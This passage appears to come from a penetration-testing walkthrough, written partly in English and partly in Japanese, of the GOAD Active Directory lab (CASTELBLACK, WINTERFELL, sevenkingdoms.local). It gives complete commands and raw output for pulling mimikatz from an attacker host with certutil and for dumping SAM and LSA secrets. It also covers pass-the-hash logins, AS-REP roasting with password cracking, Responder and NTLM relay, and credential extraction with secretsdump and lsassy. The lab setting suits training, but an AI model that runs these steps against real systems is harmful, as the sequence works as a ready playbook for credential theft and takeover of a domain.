Download mimikatz using the target’s shell.
PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.56.104:8080/mimikatz.exe certutil -urlcache -split -f http://192.168.56.104:8080/mimikatz.exe **** Online **** 000000 ... 14ae00 CertUtil: -URLCache command completed successfully.
Dumps authentication information.
PS C:\Windows\system32> ./mimikatz.exe ./mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::sam Domain: CASTELBLACK SysKey: e726c3449239522103313bbfa17ae832 Local SID: S-1-5-21-4014308955-3248381926-711700073 SAMKey: 8ba6eb6e2d70bd1eac7ec4298c16ca0d RID : 000001f4 (500) User : Administrator Hash NTLM: dbd13e1c4e338284ac4e9874f7de6ef4 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value: 3657700679fd58e85736b18c734f2374 * Primary:Kerberos-Newer-Keys * Default Salt : VAGRANTAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972 aes128_hmac (4096) : bb7b6aed58a7a395e0e674ac76c28aa0 des_cbc_md5 (4096) : fe58cdcd13a43243 OldCredentials aes256_hmac (4096) : 05ebd58ad12ff00465687ed1e33e4631c4739859f369ae36a7f6fccbe795fb78 aes128_hmac (4096) : 778a45f4f133513b831ce562570ac6af des_cbc_md5 (4096) : 58bf1ff4c4f4b0f2 OlderCredentials aes256_hmac (4096) : aa3c962519c1e2dee9ffb53df04325424f812bba47279767ad25eaccffd18695 aes128_hmac (4096) : 2f72e6aa959c5ea08e11deabfce6ed55 des_cbc_md5 (4096) : 62bf012513ea8c0e * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : VAGRANTAdministrator Credentials des_cbc_md5 : fe58cdcd13a43243 OldCredentials des_cbc_md5 : 58bf1ff4c4f4b0f2 RID : 000001f5 (501) User : Guest RID : 000001f7 (503) User : DefaultAccount RID : 000001f8 (504) User : WDAGUtilityAccount Hash NTLM: 4363b6dc0c95588964884d7e1dfea1f7 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 03a659ee63caba3a4abb578087d86a35 * Primary:Kerberos-Newer-Keys * Default Salt : WDAGUtilityAccount Default Iterations: 4096 Credentials aes256_hmac (4096) : e2d64d3002108324d20638239c935473767a9d7ed14d3fbfdfb9dca09b0ca43c aes128_hmac (4096) : 81a21c239b02db38b36589af9ca027a5 des_cbc_md5 (4096) : d33ba768d95dc257 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : WDAGUtilityAccount Credentials des_cbc_md5 : d33ba768d95dc257 RID : 000003e8 (1000) User : vagrant Hash NTLM: e02bc503339d51f71d913c245d35b50b Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 503d6e8e5de1854c6257b711e268fe30 * Primary:Kerberos-Newer-Keys * Default Salt : VAGRANT-2019vagrant Default Iterations : 4096 Credentials aes256_hmac (4096) : aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24 aes128_hmac (4096) : 0d7c6160ffb016857b9af96c44110ab1 des_cbc_md5 (4096) : 16dc9e8ad3dfc47f * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : VAGRANT-2019vagrant Credentials des_cbc_md5 : 16dc9e8ad3dfc47f mimikatz # mimikatz # lsadump::secrets Domain: CASTELBLACK SysKey: e726c3449239522103313bbfa17ae832 Local name: CASTELBLACK ( S-1-5-21-4014308955-3248381926-711700073 ) Domain name: NORTH ( S-1-5-21-2343606889-1312097775-3500245986 ) Domain FQDN : north.sevenkingdoms.local Policy subsystem is : 1.18 LSA Key(s) : 1, default {f577e818-b2ae-c757-1ce1-c340c37c62df} [00] {f577e818-b2ae-c757-1ce1-c340c37c62df} 0ba3686dd3c0e1bc912fad05b7544d38a2c57ffe99ae0282cde6eb1553647a56 Secret : $MACHINE.ACC cur/hex : 11 11 80 6e 0b f8 db 39 1c b1 c0 2c 64 11 c3 4b ce 4b 04 22 53 b8 62 a6 ba a7 4e 0a 76 54 78 09 99 ff 01 c1 d5 3d 59 8e d0 8f 16 8c 35 ca 13 30 35 83 a2 33 43 a9 65 fa 4b 8f 72 af df b6 33 71 b8 f3 d6 ae b4 5d 7e 1e 3c 3f 91 d4 f1 ee a5 97 7a 41 03 0a 4e 83 60 3b 6c 4d 78 db 03 72 8b c7 9b 04 1b 02 fc 53 94 3f 14 ce 01 4e d7 fa 7c 33 5c 7e 15 04 67 b8 db a0 02 32 56 d6 f3 76 15 0c 45 c7 bd e0 63 5e 2d 1e d5 38 48 68 5f 8a dd d1 00 82 7f 32 0d 24 d0 ca 91 02 a6 ca 78 24 ec c7 99 4f 0e d4 33 c3 25 a7 e7 2d 20 96 0c e3 79 75 70 27 22 18 fb fb 88 68 fb a0 03 7a ce 07 45 9c 34 eb 05 cf 05 c0 0b 9a 78 08 26 76 e4 5a 12 83 da 88 77 2c b7 88 1a 96 31 29 98 f4 9b 2b 92 a4 57 5a 46 be 4a 2d 83 9a 0e fd 7d 6f 5d 0b 30 f0 NTLM:20425334e9f78d883485696487ab1b67 SHA1:8f582df44ed1c9e9c9d26be730c0b99226271cf4 old/text: Ne[&3Mqp!):;U8#4v*-RfAP_\r"g$aYuI UHU1ULGN>Sk:%(qp pLyzv(c+:ymAFVzKUhMjT5>)n0&x.:nEB6?vEv8G0SqH;z<uZ]08>6.rR2d-,8N%oN0a NTLM:f2128cf1b7f7b8aba5ba5e2bc89b9439 SHA1:dd3838e03f855224da1aed2ceb1a0cdcfa4a352b Secret: DefaultPassword old/text: vagrant Secret: DPAPI_SYSTEM cur/hex: 01 00 00 00 13 08 72 a1 a2 43 87 df 59 aa e0 5e 7d 4c a0 c9 8d d5 53 5d 86 a5 36 90 af 0f cd 44 90 28 0e de 09 9b c6 84 e1 1a 69 18 full: 130872a1a24387df59aae05e7d4ca0c98dd5535d86a53690af0fcd4490280ede099bc684e11a6918 m/u : 130872a1a24387df59aae05e7d4ca0c98dd5535d / 86a53690af0fcd4490280ede099bc684e11a6918 old/hex : 01 00 00 00 f8 8a ba f4 5d f8 7a f3 1f 7a 1f 2d 8f c0 48 de 9f 8c a8 77 c0 90 ca 12 69 d8 47 13 c9 de 69 bc 50 3e ae 27 c6 ea 74 26 full: f88abaf45df87af31f7a1f2d8fc048de9f8ca877c090ca1269d84713c9de69bc503eae27c6ea7426 m/u : f88abaf45df87af31f7a1f2d8fc048de9f8ca877 / c090ca1269d84713c9de69bc503eae27c6ea7426 Secret : NL$KM cur/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9 old/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9 Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : north.sevenkingdoms.local\sql_svc cur/text: YouWillNotKerboroast1ngMeeeeee Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS mimikatz #
Now that we have successfully obtained the authentication information, let’s try logging in using Pass-the-hash.
┌──(kali㉿kali)-[~] └─$ evil-winrm -u Administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -i castelblack Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
I was able to obtain Administrator privileges for CASTELBLACK.
Winterfell walkthrough (administrator privileges)
Find users at north.sevenkingdoms.local/.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:35976c73e5060906dab8147e5b1d2744$ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
I got brandon.stark’s krb5asrep so I’ll try cracking it with john.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt brandon.stark.krb5asrep.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status iseedeadpeople ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL) 1g 0:00:00:00 DONE (2024-10-11 22:46) 5.555g/s 301511p/s 301511c/s 301511C/s soydivina..250984 Use the "--show" option to display all of the cracked passwords reliably Session completed.
brandon.stark/iseedadpeopleI got the authentication information.
Now that we have obtained the authentication information of a user belonging to the north.sevenkingdoms.local domain, let’s try to use it to perform bloodhound.
Try adding a name server to resolve.conf (the ns flag should probably work too).
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ cat /etc/resolv.conf # Generated by NetworkManager nameserver 10.0.2.3 nameserver 192.168.56.10
Run bloodhound-python.
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local INFO: Found AD domain: north.sevenkingdoms.local WARNING: Could not find a global catalog server, assuming the primary DC has this role If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc INFO: Getting TGT for user INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 2 computers INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local INFO: Found 17 users INFO: Found 51 groups INFO: Found 3 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 1 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: castelblack.north.sevenkingdoms.local INFO: Querying computer: winterfell.north.sevenkingdoms.local INFO: Done in 00M 00S INFO: Compressing output into 20241011225036_bloodhound.zip
We were able to obtain the information. We will continue to obtain information on other domains in this manner.
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local INFO: Found AD domain: sevenkingdoms.local INFO: Getting TGT for user INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local INFO: Found 16 users INFO: Found 59 groups INFO: Found 2 gpos INFO: Found 9 ous INFO: Found 19 containers INFO: Found 2 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: kingslanding.sevenkingdoms.local INFO: Done in 00M 00S INFO: Compressing output into 20241011225327_bloodhound.zip
Next is essos.local.
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local INFO: Found AD domain: essos.local INFO: Getting TGT for user INFO: Connecting to LDAP server: meereen.essos.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: meereen.essos.local INFO: Found 14 users INFO: Found 59 groups INFO: Found 3 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 1 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: braavos.essos.local INFO: Querying computer: meereen.essos.local INFO: Done in 00M 00S INFO: Compressing output into 20241011225440_bloodhound.zip
I got three bloodhound results.
If you throw it at Bloodhound, it will display the relationships in a nice way.
We can see that the Administrator password is reused in Winterfell.
┌──(kali㉿kali)-[~] └─$ nxc winrm 192.168.56.10-12 192.168.56.22-23 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' WINRM 192.168.56.10 5985 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) WINRM 192.168.56.12 5985 MEEREEN [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) WINRM 192.168.56.23 5985 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) WINRM 192.168.56.11 5985 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) WINRM 192.168.56.22 5985 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) WINRM 192.168.56.10 5985 KINGSLANDING [-] kingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 WINRM 192.168.56.12 5985 MEEREEN [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 WINRM 192.168.56.23 5985 BRAAVOS [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 WINRM 192.168.56.11 5985 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) WINRM 192.168.56.22 5985 CASTELBLACK [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
That being said, let’s explore other authentication routes.
Gathers information about services with disabled SMB signing to launch NTLM relay attacks.
┌──(kali㉿kali)-[~/goad] └─$ nxc smb 192.168.56.10-23 --gen-relay-list relay.txt SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00 ┌──(kali㉿kali)-[~/goad] └─$ cat relay.txt 192.168.56.23 192.168.56.22
サイニング false なターゲットの情報を取得できたので NTLM 認証を中継することができそうです。
Responderの設定を変更します。
┌──(kali㉿kali)-[~/goad]
└─$ sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/\responder/Responder.conf && sudo cat /etc/responder/Responder.conf | grep --color=never 'HTTP ='
HTTP = Off
┌──(kali㉿kali)-[~/goad]
└─$ sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf && sudo cat /etc/responder/Responder.conf | grep --color=never 'HTTP ='
HTTP = Off
ntlmrelayx を起動します。
┌──(kali㉿kali)-[~/goad] └─$ impacket-ntlmrelayx -tf relay.txt -of netntlm -smb2support -socks Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client MSSQL loaded.. [*] Running in relay mode to hosts in targetfile [*] SOCKS proxy started. Listening on 127.0.0.1:1080 [*] SMB Socks Plugin loaded.. [*] HTTP Socks Plugin loaded.. [*] SMTP Socks Plugin loaded.. [*] IMAP Socks Plugin loaded.. [*] IMAPS Socks Plugin loaded.. [*] MSSQL Socks Plugin loaded.. [*] HTTPS Socks Plugin loaded.. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver' * Debug mode: off [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx>
Responderも起動します。
┌──(kali㉿kali)-[~]
└─$ sudo responder -I eth1
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth1]
Responder IP [192.168.56.104]
Responder IPv6 [fe80::5af0:79:dd52:80d1]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-E217ZFS7CUP]
Responder Domain Name [DCK5.LOCAL]
Responder DCE-RPC Port [47652]
[+] Listening for events...
ntlmrelayxでしばらく待つと下記の内容が出力されます。
ntlmrelayx> [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-13 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.23 [*] Authenticating against smb://192.168.56.23 as NORTH/EDDARD.STARK SUCCEED [*] SOCKS: Adding NORTH/EDDARD.STARK@192.168.56.23(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-13 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.22 [*] Authenticating against smb://192.168.56.22 as NORTH/EDDARD.STARK SUCCEED [*] SOCKS: Adding NORTH/EDDARD.STARK@192.168.56.22(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-13 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-14 (process_request_thread): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-15 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.23 [*] Authenticating against smb://192.168.56.23 as NORTH/ROBB.STARK SUCCEED [*] SOCKS: Adding NORTH/ROBB.STARK@192.168.56.23(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-15 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.22 [*] Authenticating against smb://192.168.56.22 as NORTH/ROBB.STARK SUCCEED [*] SOCKS: Adding NORTH/ROBB.STARK@192.168.56.22(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-15 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication [*] SMBD-Thread-16 (process_request_thread): Connection from NORTH/ROBB.STARK@192.168.56.11 controlled, but there are no more targets left! [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
というわけで中間者攻撃しつつ socks プロキシを使えるようになりました。
それでもって proxychains で繋ぎつつ secretsdump を走らせます。
┌──(kali㉿kali)-[~/goad] └─$ proxychains impacket-secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xe726c3449239522103313bbfa17ae832 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Dumping cached domain logon information (domain/username:hash) NORTH.SEVENKINGDOMS.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a: (2024-08-11 04:00:35) NORTH.SEVENKINGDOMS.LOCAL/robb.stark:$DCC2$10240#robb.stark#f19bfb9b10ba923f2e28b733e5dd1405: (2024-10-13 02:15:32) [*] Dumping LSA Secrets [*] $MACHINE.ACC NORTH\CASTELBLACK$:aes256-cts-hmac-sha1-96:7f588d89c8e329850eb2cfcb6f20dcc68346a58b33748b8ba3762f365bfd3857 NORTH\CASTELBLACK$:aes128-cts-hmac-sha1-96:7171432588c012604326db931b606ad9 NORTH\CASTELBLACK$:des-cbc-md5:08f707b33d52a2b6 NORTH\CASTELBLACK$:plain_password_hex:1111806e0bf8db391cb1c02c6411c34bce4b042253b862a6baa74e0a7654780999ff01c1d53d598ed08f168c35c a13303583a23343a965fa4b8f72afdfb63371b8f3d6aeb45d7e1e3c3f91d4f1ee a5977a41030a4e83603b6c4d78db03728bc79b041b02fc53943f14ce014ed7fa7 c335c7e150467b8dba0023256d6f376150c45c7bde0635e2d1ed53848685f8ad dd100827f320d24d0ca9102a6ca7824ecc7994f0ed433c325a7e72d20960ce379 7570272218fbfb8868fba0037ace07459c34eb05cf05c00b9a78082676e45a128 3da88772cb7881a96312998f49b2b92a4575a46be4a2d839a0efd7d6f5d0b30f0 NORTH\CASTELBLACK$:aad3b435b51404eeaad3b435b51404ee:20425334e9f78d883485696487ab1b67::: [*] DPAPI_SYSTEM dpapi_machinekey:0x130872a1a24387df59aae05e7d4ca0c98dd5535d dpapi_userkey:0x86a53690af0fcd4490280ede099bc684e11a6918 [*] NL$KM 0000 22 34 01 76 01 70 30 93 88 A7 6B B2 87 43 59 69 "4.v.p0...k..CYi 0010 0E 41 BD 22 0A 0C CC 23 3A 5B B6 74 CB 90 D6 35 .A."...#:[.t...5 0020 14 CA D8 45 4A F0 DB 72 D5 CF 3B A1 ED 7F 3A 98 ...EJ..r..;...:. 0030 CD 4D D6 36 6A 35 24 2D A0 EB 0F 8E 3F 52 81 C9 .M.6j5$-....?R.. NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d 63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9 [*] _SC_MSSQL$SQLEXPRESS north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee [*] Cleaning up... [*] Stopping service RemoteRegistry
Next, let’s use lsassy to get LSASS information. https://github.com/login-securite/lsassy
┌──(kali㉿kali)-[~/goad] └─$ proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK [+] 192.168.56.22 Authentication successful [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:445 ... OK [+] 192.168.56.22 Lsass dumped in C:\Windows\Temp\6HGg19bP.jpg (51439491 Bytes) [+] 192.168.56.22 Lsass dump deleted [+] 192.168.56.22 NORTH\robb.stark [NT] 831486ac7f26860c9e2f51ac91e1a07a | [SHA1] 3bea28f1c440eed7be7d423cefebb50322ed7b6c [+] 192.168.56.22 NORTH\CASTELBLACK$ [NT] 20425334e9f78d883485696487ab1b67 | [SHA1] 8f582df44ed1c9e9c9d26be730c0b99226271cf4 [+] 192.168.56.22 north.sevenkingdoms.local\CASTELBLACK$ [PWD] 1111806e0bf8db391cb1c02c6411c34bce4b042253b862a6baa74e0a7654780999ff01c1d53d598ed08f168c35ca13303583a23343a965fa4b8f72af dfb63371b8f3d6aeb45d7e1e3c3f91d4f1eea5977a41030a4e83603b6c4d78db03728bc79b041b02fc53943f14ce014ed7fa7c335c7e150467b8dba0 023256d6f376150c45c7bde0635e2d1ed53848685f8addd100827f320d24d0ca9102a6ca7824ecc7994f0ed433c325a7e72d20960ce3797570272218 fbfb8868fba0037ace07459c34eb05cf05c00b9a78082676e45a1283da88772cb7881a96312998f49b2b92a4575a46be4a2d839a0efd7d6f5d0b30f0 [+] 192.168.56.22 NORTH\sql_svc [NT] 84a5092f53390ea48d660be52b93b804 | [SHA1] 9fd961155e28b1c6f9b3859f32f4779ad6a06404 [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\robb.stark [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_d9e9f780.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\robb.stark [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_5fb85f38.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\sql_svc [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_sql_svc_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_1ac82095.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_e55cd434.kirbi) [+] 192.168.56.22 